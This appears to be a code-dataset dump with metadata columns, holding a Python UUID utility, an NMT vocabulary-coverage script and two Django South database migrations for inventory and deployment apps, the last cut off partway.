c_uuid(puuid, cuuid)
return cuuid
| #!/usr/bin/python
"""
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
import ctypes
import uuid
def c_uuid_to_str(uuid):
""" utility function to convert a C uuid into a standard string format """
uuid_str = '{:02X}{:02X}{:02X}{:02X}-{:02X}{:02X}-{:02X}{:02X}-{:02X}'\
'{:02X}-{:02X}{:02X}{:02X}{:02X}{:02X}{:02X}'.format(
uuid[0], uuid[1], uuid[2], uuid[3], uuid[4], uuid[5],
uuid[6], uuid[7], uuid[8], uuid[9], uuid[10], uuid[11],
uuid[12], uuid[13], uuid[14], uuid[15])
return uuid_str
def c_uuid(p_uuid, c_uuid):
""" utility function to create a UUID in C format from a python UUID """
hexstr = p_uuid.hex
for i in range(0, 31, 2):
c_uuid[int(i/2)] = int(hexstr[i:i+2], 16)
def str_to_c_uuid(uuidstr):
""" utility function to convert string format uuid to a C uuid """
uuidstr2 = '{' + uuidstr + '}'
puuid = uuid.UUID(uuidstr2)
cuuid = (ctypes.c_ubyte * 16)()
c_uuid(puuid, cuuid)
return cuuid
| en | 0.828556 | #!/usr/bin/python (C) Copyright 2018 Intel Corporation. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE The Government's rights to use, modify, reproduce, release, perform, display, or disclose this software are subject to the terms of the Apache License as provided in Contract No. B609815. Any reproduction of computer software, computer software documentation, or portions thereof marked with this legend must also reproduce the markings. utility function to convert a C uuid into a standard string format utility function to create a UUID in C format from a python UUID utility function to convert string format uuid to a C uuid | 2.770958 | 3 |
experiments/nmt/utils/vocabulary_coverage.py | lvapeab/GroundHog_INMT | 0 | 8559 | import cPickle
import argparse
parser = argparse.ArgumentParser(
"Computes the coverage of a shortlist in a corpus file")
parser.add_argument("--vocab",
required=True, help="Vocabulary to use (.pkl)")
parser.add_argument("--text",
required=True, help="Beam size, turns on beam-search")
args = parser.parse_args()
with open(args.vocab, 'rb') as f:
d = cPickle.load(f)
with open(args.text, 'rb') as f:
text = f.read().splitlines()
n_words = 0
n_unks = 0
split_vocab = 0
split_vocabulary = {}
for line in text:
for word in line.split():
if split_vocabulary.get(word) is None:
split_vocabulary[word] = split_vocab
split_vocab += 1
if d.get(word) is None:
n_unks += 1
n_words += 1
print "Coverage: %f (%d unknown words out of %d of a total of %d)"%((float)(split_vocab - n_unks)/split_vocab, n_unks, split_vocab, n_words)
| import cPickle
import argparse
parser = argparse.ArgumentParser(
"Computes the coverage of a shortlist in a corpus file")
parser.add_argument("--vocab",
required=True, help="Vocabulary to use (.pkl)")
parser.add_argument("--text",
required=True, help="Beam size, turns on beam-search")
args = parser.parse_args()
with open(args.vocab, 'rb') as f:
d = cPickle.load(f)
with open(args.text, 'rb') as f:
text = f.read().splitlines()
n_words = 0
n_unks = 0
split_vocab = 0
split_vocabulary = {}
for line in text:
for word in line.split():
if split_vocabulary.get(word) is None:
split_vocabulary[word] = split_vocab
split_vocab += 1
if d.get(word) is None:
n_unks += 1
n_words += 1
print "Coverage: %f (%d unknown words out of %d of a total of %d)"%((float)(split_vocab - n_unks)/split_vocab, n_unks, split_vocab, n_words)
| none | 1 | 2.947798 | 3 |
|
stores/apps/inventory/migrations/0001_initial.py | diassor/CollectorCity-Market-Place | 135 | 8560 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProductType'
db.create_table('inventory_producttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('inventory', ['ProductType'])
# Adding model 'Product'
db.create_table('inventory_product', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)),
))
db.send_create_signal('inventory', ['Product'])
# Adding model 'Coin'
db.create_table('inventory_coin', (
('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)),
('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)),
('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('inventory', ['Coin'])
def backwards(self, orm):
# Deleting model 'ProductType'
db.delete_table('inventory_producttype')
# Deleting model 'Product'
db.delete_table('inventory_product')
# Deleting model 'Coin'
db.delete_table('inventory_coin')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'inventory.coin': {
'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']},
'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}),
'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}),
'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"})
},
'inventory.product': {
'Meta': {'object_name': 'Product'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}),
'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'})
},
'inventory.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['inventory']
| # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProductType'
db.create_table('inventory_producttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('inventory', ['ProductType'])
# Adding model 'Product'
db.create_table('inventory_product', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)),
))
db.send_create_signal('inventory', ['Product'])
# Adding model 'Coin'
db.create_table('inventory_coin', (
('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)),
('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)),
('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('inventory', ['Coin'])
def backwards(self, orm):
# Deleting model 'ProductType'
db.delete_table('inventory_producttype')
# Deleting model 'Product'
db.delete_table('inventory_product')
# Deleting model 'Coin'
db.delete_table('inventory_coin')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'inventory.coin': {
'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']},
'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}),
'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}),
'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"})
},
'inventory.product': {
'Meta': {'object_name': 'Product'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}),
'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'})
},
'inventory.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['inventory']
| en | 0.654754 | # encoding: utf-8 # Adding model 'ProductType' # Adding model 'Product' # Adding model 'Coin' # Deleting model 'ProductType' # Deleting model 'Product' # Deleting model 'Coin' | 2.163169 | 2 |
src/ralph/deployment/migrations/0005_auto__add_field_archiveddeployment_service__add_field_archiveddeployme.py | vi4m/ralph | 1 | 8561 | <reponame>vi4m/ralph
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ArchivedDeployment.service'
db.add_column('deployment_archiveddeployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'ArchivedDeployment.device_environment'
db.add_column('deployment_archiveddeployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.service'
db.add_column('deployment_deployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.device_environment'
db.add_column('deployment_deployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
def backwards(self, orm):
# Deleting field 'ArchivedDeployment.service'
db.delete_column('deployment_archiveddeployment', 'service_id')
# Deleting field 'ArchivedDeployment.device_environment'
db.delete_column('deployment_archiveddeployment', 'device_environment_id')
# Deleting field 'Deployment.service'
db.delete_column('deployment_deployment', 'service_id')
# Deleting field 'Deployment.device_environment'
db.delete_column('deployment_deployment', 'device_environment_id')
models = {
'account.profile': {
'Meta': {'object_name': 'Profile'},
'activation_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'birth_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'cost_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'country': ('django.db.models.fields.PositiveIntegerField', [], {'default': '153'}),
'department': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'employee_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'gender': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'home_page': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '1', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'manager': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'nick': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '30', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'time_zone': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
